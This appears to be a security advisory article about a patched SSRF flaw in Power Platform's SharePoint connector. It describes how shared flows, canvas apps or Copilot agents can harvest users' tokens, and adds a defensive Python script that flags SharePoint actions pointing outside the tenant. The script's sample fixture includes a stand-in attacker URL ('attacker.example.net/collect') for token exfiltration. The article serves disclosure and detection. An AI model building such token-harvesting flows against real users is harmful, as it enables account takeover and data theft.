Researchers have disclosed details of a now-patched flaw in the Microsoft SharePoint connector that could allow threat actors to harvest users' access tokens for Microsoft's Power Platform (Power BI, Power Apps, Power Automate, and Power Virtual Agents).

The vulnerability affects the Microsoft SharePoint connector on the Power Platform and could allow an attacker to send requests to Microsoft SharePoint on behalf of a user, exposing sensitive data to unauthorised access. It can be exploited from Power Automate and Power Apps, and also from Microsoft's Artificial Intelligence (AI) offerings, Copilot Studio and Microsoft 365 Copilot, giving it a broad scope of potential damage. At its core, the flaw is an instance of Server-Side Request Forgery (SSRF): the connector's "custom value" input, which lets a maker type an arbitrary site address instead of picking one from the list, permits an attacker to inject their own URL as part of the flow, so the connector sends the request, together with the running user's token, to a server the attacker controls.
There is, however, a caveat for successful exploitation. The attacker must first gain access to an account holding the "Environment Maker" and "Basic User" roles in the Power Platform. The Environment Maker role allows the attacker to create and share malicious apps and flows, and the Basic User role allows them to run apps and interact with resources that they own on the Power Platform.
Attack Scenarios
An attacker with the Environment Maker role creates a flow containing a SharePoint action whose site address is an attacker-controlled URL. They then share this flow with a low-privilege victim user; when the victim runs it, the connector sends the request with the victim's SharePoint JWT access token to the attacker's server, exposing the token. With the exposed token, the attacker can send requests outside of the Power Platform on behalf of the victim user.
The attacker can similarly harvest tokens for other services such as Copilot Studio and Power Apps by creating a seemingly benign Copilot agent or canvas app.
One way of getting users to interact with the app or agent is to embed it in a Teams chat, resulting in a watering-hole attack of sorts in which the token of every user who interacts with the app or agent can be harvested by the attacker.
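Because the attack hinges on a SharePoint action whose site address points outside the tenant, a defender can hunt for it in exported flow definitions. The script below is an added example written for this page, not code from the original article or from the researchers: it walks a Power Automate workflow definition (the JSON object carrying `triggers` and `actions`, including actions nested inside Condition, Scope and Apply-to-each blocks) and flags every SharePoint connector action whose parameters contain a URL on a host that is not one of the tenant's own SharePoint hosts. The sample definition, the trusted host list (`contoso.sharepoint.com`), and the assumption that SharePoint actions are identified by an `apiId` containing `shared_sharepointonline` are all constructed for illustration and should be checked against your own exports.

```python
"""Hunt for SharePoint connector actions that point outside the tenant.

Added example: scans a Power Automate workflow definition for the
attacker-supplied site address described in the article. All schema
details and sample data here are assumptions, not the vendor's spec.
"""
import re
from urllib.parse import urlparse

# Assumption: the tenant's legitimate SharePoint hosts. Replace with your own.
TRUSTED_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}

# Assumption: SharePoint Online actions carry an apiId containing this segment.
SHAREPOINT_API_MARKER = "shared_sharepointonline"

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)


def iter_strings(value):
    """Yield every string nested anywhere inside a JSON-like structure."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from iter_strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from iter_strings(item)


def iter_actions(node):
    """Yield (name, action) for every action, recursing into the 'actions'
    (and 'else' branch) of Condition / Scope / Apply-to-each containers."""
    for name, action in node.get("actions", {}).items():
        yield name, action
        yield from iter_actions(action)
        if "else" in action:
            yield from iter_actions(action["else"])


def is_sharepoint_action(action):
    host = action.get("inputs", {}).get("host", {})
    api_id = host.get("apiId", "") or host.get("connectionName", "")
    return SHAREPOINT_API_MARKER in api_id.lower()


def find_untrusted_urls(definition):
    """Return [(action_name, url)] for SharePoint actions whose parameters
    contain a URL whose host is outside TRUSTED_HOSTS. Hosts are compared
    via urlparse, so 'contoso.sharepoint.com.evil.example' or
    'evil.example#contoso.sharepoint.com' are still flagged."""
    findings = []
    for name, action in iter_actions(definition):
        if not is_sharepoint_action(action):
            continue
        params = action.get("inputs", {}).get("parameters", {})
        for text in iter_strings(params):
            for url in URL_RE.findall(text):
                host = (urlparse(url).hostname or "").lower()
                if host not in TRUSTED_HOSTS:
                    findings.append((name, url))
    return findings


# Constructed sample definition: one benign SharePoint action, one SharePoint
# HTTP action nested in a Condition with an attacker-supplied site address,
# and one non-SharePoint action containing an external URL (must be ignored).
SHAREPOINT_API = "/providers/Microsoft.PowerApps/apis/shared_sharepointonline"
SAMPLE_DEFINITION = {
    "triggers": {"manual": {"type": "Request", "kind": "Button"}},
    "actions": {
        "Get_items": {
            "type": "OpenApiConnection",
            "inputs": {
                "host": {"apiId": SHAREPOINT_API, "operationId": "GetItems"},
                "parameters": {"dataset": "https://contoso.sharepoint.com/sites/HR",
                               "table": "list-id-placeholder"},
            },
        },
        "Condition": {
            "type": "If",
            "actions": {
                "Send_an_HTTP_request_to_SharePoint": {
                    "type": "OpenApiConnection",
                    "inputs": {
                        "host": {"apiId": SHAREPOINT_API, "operationId": "HttpRequest"},
                        "parameters": {"dataset": "https://attacker.example.net/collect",
                                       "parameters/method": "GET",
                                       "parameters/uri": "_api/web"},
                    },
                }
            },
            "else": {"actions": {}},
        },
        "Send_an_email": {
            "type": "OpenApiConnection",
            "inputs": {
                "host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_office365",
                         "operationId": "SendEmailV2"},
                "parameters": {"emailMessage/Body": "Report: https://example.org/report"},
            },
        },
    },
}

if __name__ == "__main__":
    for action_name, url in find_untrusted_urls(SAMPLE_DEFINITION):
        print(f"SUSPICIOUS: action '{action_name}' targets {url}")
```

Run it over the `definition` object extracted from each flow in an environment export; a hit means a SharePoint action will send a user's token to a host you do not own. The check deliberately uses the parsed hostname rather than a substring match, so padding the attacker's host with `sharepoint.com` in the path, fragment or subdomain does not evade it.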